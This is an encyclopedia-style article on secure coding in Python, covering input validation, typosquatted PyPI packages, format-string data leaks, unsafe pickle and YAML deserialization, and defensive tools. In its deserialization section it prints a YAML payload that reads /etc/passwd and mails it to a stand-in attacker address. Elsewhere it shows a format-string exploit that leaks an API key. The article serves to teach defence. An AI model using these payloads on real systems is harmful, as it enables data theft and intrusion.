Secure Coding with Python
- Summary
-
Discussion
- What are some guidelines for writing more secure Python code?
- How should I manage Python dependencies for a more secure application?
- What security risks do Python strings pose if used improperly?
- What's a secure way to do data deserialization in Python?
- What are some resources for Python developers to create more secure code?
- Milestones
- Sample Code
- References
- Further Reading
- Article Stats
- Cite As
Writing secure code is essential for protecting sensitive data and maintaining correct behaviour of applications. This is more relevant today when most applications connect to the web, exchange data and even update themselves. While security considerations and best practices are typically language agnostic, in this article we focus on Python-specific issues.
OWASP's Python Security project has identified three angles: Security in Python (white-box analysis, functional analysis), Security of Python (black-box analysis), and Security with Python (develop security-hardened Python).
While some vulnerabilities are due to the way Python modules and functions behave, others are due to the manner in which third-party packages are distributed. Since Python is an open developer ecosystem, anyone can share their own packages that others can use in their projects. However, this opens up a security risk that developers need to be aware of.
Discussion
-
What are some guidelines for writing more secure Python code? It's essential to validate user input. If not, an attacker could execute arbitrary code. Python functions
eval()
,exec()
,input()
,popen()
,subprocess()
andos.system()
are dangerous in this regard. These could be used to bypass authentication or inject code. For example, Python2'sinput()
could be exploited. An input ofpasswd
to the statementif passwd == input("Please enter your password"):
would bypass authentication.Databases are also vulnerable to inputs. Commonly called SQL injection, using inputs directly in database commands is dangerous. Instead, validate the inputs and query databases via an ORM. Among the well-known Python ORMs are Django ORM, SQLAlchemy and Peewee.
Python
assert
statement must be used only on invariants for debugging. Using them for authentication (such asassert user.is_admin, "user does not have access"
) is wrong. Often on production servers,__debug__ == False
and assert statements won't work.To create temporary files, avoid the deprecated
tempfile.mktemp()
function. In general, keep your Python distribution and the packages you use up to date. For example, earlier CPython implementations of Python had memory overflow errors that could be exploited for arbitrary code execution. -
How should I manage Python dependencies for a more secure application? PyPI is the repository from where third-party Python packages can be downloaded and installed if required by your project. Direct dependencies may have further dependencies. Any of these could have malicious code.
It's easy to create a malicious package based on a well-known package since the original code is open source and easily copied. Often these packages behave normally since the malicious code only resides in
setup.py
that executes once during installation. This is enough to install software that can later steal data or monitor behaviour. Some attacks modify the original code, for example, to steal SSH credentials.Developers can be tricked into installing the wrong package by a slight modification of the original package name. This is called typosquatting. There are plenty of examples:
acqusition
impersonatesacquisition
;bzip
impersonatesbz2file
;crypt
impersonatescrypto
;setup-tools
impersonatessetuptools
;urlib3
impersonatesurllib3
;diango
impersonatesdjango
.PEP458 proposes signing a package. However, this only verifies its author's identity. Instead, a combination of dynamic analysis (within a sandbox) and static analysis can be used to catch malicious packages.
-
What security risks do Python strings pose if used improperly? Python3 introduced
str.format()
as a more powerful and flexible way to format strings. This method is called on a format string and it accepts Python objects as arguments. The problem is that attributes of these arguments can be accessed from within the format string. If the application allows users control of the format string, they can be misused to leak sensitive data.There are a few cases where such control may be common. Applications that are translated into multiple languages may use untrusted translators who may be given control of the format string. Some applications may permit users to configure behaviour that might be exposed as format strings.
An example exploit is the code
"{person.__init__.__globals__[CONFIG][API_KEY]}".format(person)
, where sensitive global data from aCONFIG
dictionary is being accessed via the argument.We can overcome this by validating the format string. One approach is shown by Armin Ronacher who subclasses
Formatter
andMapping
, makes use offormatter_field_name_split
and throws anAttributeError
if unsafe formats are detected. -
What's a secure way to do data deserialization in Python? Deserialization recreates Python objects by reading its representation from disk or network interface. It's possible to deserialize malicious data and thereby execute arbitrary code in your system. This is because objects are not just values. They contain constructors and methods that are executable code.
For example, a web application could store user information in a cookie that's formed using
cPickles
orpickle
module. The object's__reduce__
method could be modified to contain malicious code. This method would be called during deserialization. A better approach would be to usejson.loads()
. IfcPickles
is used, verify the payload integrity using cryptographic signatures. PyCrypto is a useful package for this.Another serialization format is YAML. YAML files can represent Python objects. Like
pickle
, it's possible to modify them to bypass authentication or execute arbitrary code. For example, configuration files in Ansible are YAML files. The following code obtains passwords and emails the same to the hacker's address:!!python/object/apply:os.system ["cat /etc/passwd | mail hacker@domain.com"]
. Essentially, it's unwise to deserialize from an untrusted source. A safer alternative is to useyaml.safe_load()
rather thanyaml.load()
. -
What are some resources for Python developers to create more secure code? Python core modules that can help developers build security features include
hashlib
,hmac
andsecrets
. For passwords and security tokens,secrets
must be preferred overrandom
. Functionshmac.compare_digest()
andsecrets.compare_digest()
are designed to mitigate timing attacks.Bandit is a useful static linter that can alert developers to common security issues in code. Another static analyzer, open sourced by Facebook, is Pysa. To audit installed packages and their versions, use a tool such as Chef InSpec. PyUp tracks thousands of Python packages for vulnerabilities and makes pull requests to your codebase automatically when there are updates.
Python Security is an OWASP project aimed at creating a security-hardened version of Python. Their page on security concerns in modules and functions is worth reading. They've also curated a list of Python libraries for security applications.
Some Python Enhancement Proposals (PEPs) specific to security are worth reading for in-depth understanding. Among them are PEP458, PEP506, PEP551, and PEP578.
Milestones
2008
Python 3.0 is released. This release includes PEP 3101 -- Advanced String Formatting. Strings can now be formatted using the str.format()
method. For more secure code, it's noted that applications shouldn't format strings from untrusted sources. The next best approach is to ensure that string formatting doesn't result in visible side effects, though this is not easy to achieve given the open nature of Python.
2011
Marco Slaviero publishes a detailed report on the many possible exploits and attack scenarios on the pickle
module. He gives guidelines on how to write shellcode to create such exploits. He provides a library of exploits such as retrieve a list of globals and locals, make operating system calls, execute arbitrary Python code, alter local variables or create a DoS attacks.
2016
Python 3.6.0 is released. This release includes the secrets
module that's documented in PEP 506. Python's existing random
module is not suited for security purposes. Though documentation makes this clear, many implementations are seen to ignore this warning. To solve this problem, secrets
module includes ready-to-use functions for managing passwords, tokens and other secrets.
2018
2019
Discussions start towards implementing PEP 458 -- Secure PyPI downloads with signed repository metadata. Although this PEP was started in 2013, funding becomes available only recently. The idea of this proposal is that authors need not sign the packages they upload to PyPI. PyPI will automatically sign these packages using keys managed by PyPI. This is called minimum security model. This PEP doesn't address the maximum security model in which authors can sign the packages.
2019
German software developer Lukas Martini finds two packages on PyPI that are doing typosquatting. These are python3-dateutil
(impersonating dateutil
) and jeIlyfish
(impersonating jellyfish
). The former doesn't have any malicious code but it imports the latter. Package jeIlyfish
downloads a file, decodes that into Python code and executes it. This code attempts to read SSH and GPG keys from the computer and send them to a specific IP address.
2020
Facebook open sources Pysa, a static analysis code to detect and prevent security issues in Python code. It's shipped as part of Pyre, a static type checker tool. Pysa tracks data flows. Developers define sources where data originates and sinks where data shouldn't end up. It warns when data reaches a sink. It has techniques to mitigate false positives and false negatives.
Sample Code
References
- Bertus. 2018. "Detecting Cyber Attacks in the Python Package Index (PyPI)." Medium, October 13. Accessed 2020-03-20.
- Bleaney, Graham and Sinan Cepel. 2020. "Pysa: An open source static analysis tool to detect and prevent security issues in Python code." Blog, Facebook Engineering, August 7. Accessed 2020-08-11.
- Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
- Chef InSpec Docs. 2020. "pip." Chef InSpec Docs, v4.18.100. Accessed 2020-03-21.
- Cimpanu, Catalin. 2017. "Ten Malicious Libraries Found on PyPI - Python Package Index." BleepingComputer, September 15. Accessed 2020-03-20.
- Cimpanu, Catalin. 2018. "Twelve malicious Python libraries found and removed from PyPI." ZDNet, October 27. Accessed 2020-03-20.
- Cimpanu, Catalin. 2019. "Two malicious Python libraries caught stealing SSH and GPG keys." ZDNet, December 4. Accessed 2020-03-20.
- D'Aprano, Steven. 2015. "PEP 506 -- Adding A Secrets Module To The Standard Library." Python.org, September 19. Accessed 2020-03-20.
- Franklin Jr, Curtis. 2019. "Malware in PyPI Code Shows Supply Chain Risks." Dark Reading, July 19. Accessed 2020-03-20.
- Kuppusamy, Trishank Karthik, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, and Justin Cappos. 2013. "PEP 458 -- Secure PyPI downloads with signed repository metadata." Python.org, September 27. Updated 2019-11-13. Accessed 2020-03-20.
- Leblanc, Maxime. 2018. "Rotten pickles: A quick introduction to offensive serialization techniques." poka-techblog, on Medium, March 13. Accessed 2020-03-20.
- Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
- Makai, Matt. 2020. "Object-relational Mappers (ORMs)." Full Stack Python. Accessed 2020-03-21.
- Mavituna, Ferruh. 2015. "SQL Injection Cheat Sheet." Blog, Netsparker, October 21. Updated 2019-08-26. "Accessed 2020-03-20.
- National Security Authority. 2017. "skcsirt-sa-20170909-pypi." SK-CSIRT advisory, National Security Authority, Slovak Republic, September 09. Updated 2017-09-21. Accessed 2020-03-20.
- OWASP Python Security. 2020a. "OWASP Python Security Project." Accessed 2020-03-20.
- OWASP Python Security. 2020b. "Libraries." Accessed 2020-03-20.
- PyYAML Wiki. 2020. "PyYAML Documentation." Accessed 2020-03-21.
- Python. 2008. "What's New In Python 3.0." Python.org. Accessed 2020-03-21.
- Python. 2016. "Python 3.6.0." Python.org. Accessed 2020-03-21.
- Python. 2020. "Search Python.org: 'security PEP'." Accessed 2020-03-21.
- Python Docs. 2020a. "The Python Standard Library." v3.8.2, March 21. Accessed 2020-03-21.
- Python Docs. 2020b. "secrets — Generate secure random numbers for managing secrets." The Python Standard Library, v3.8.2, March 21. Accessed 2020-03-21.
- Python Docs. 2020c. "Input and Output." The Python Tutorial, v3.8.2, March 20. Accessed 2020-03-20.
- Ronacher, Armin. 2016. "Be Careful with Python's New-Style String Format." Blog, December 29. Accessed 2020-03-20.
- Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
- Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
- Talin. 2006. "PEP 3101 -- Advanced String Formatting." Python.org, April 16. Updated 2008-09-14. Accessed 2020-03-21.
- Viter, Alexander. 2018. "How to write secure code in Python." Blog, CheckiO, August 22. Accessed 2020-03-20.
Further Reading
- Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
- Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
- Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
- Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
- Denbraver, Hayley and Kenneth Reitz. 2019. "Python Security Best Practices Cheat Sheet." Blog, Synk, February 28. Accessed 2020-03-20.
Article Stats
Cite As
See Also
- Information Security Principles
- Web Exploitation
- API Security
- Cloud Security
- Network Security
- IoT Security